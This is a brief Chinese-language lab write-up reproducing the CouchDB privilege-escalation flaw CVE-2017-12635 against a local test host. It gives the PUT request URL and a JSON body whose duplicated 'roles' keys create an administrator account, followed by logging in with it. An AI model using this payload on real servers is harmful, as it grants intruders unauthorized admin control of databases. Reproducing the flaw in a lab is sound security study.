Couchdb 权限绕过漏洞复现（CVE-2017-12635）

​​

开启环境给了三个端口号，不知道哪个是正常的，最后试出来52226端口正常。

登录URL：http://192.168.91.129/_utils/#

来到了登录页面

​​

用postman发送PUT方法的请求包，这个请求包会导致数据库创建一个用户，在这会把xrzx这个用户创建出来并且加入到admin管理员组里面去

​​

然后再回到登录页面，输入刚才创建的账号和密码登录即可

​​

http://192.168.91.129/_users/org.couchdb.user:xrzx

{

"type": "user",

"name": "xrzx",

"roles": ["_admin"],

"roles": [],

"password": "admin"

}

‍

‍

‍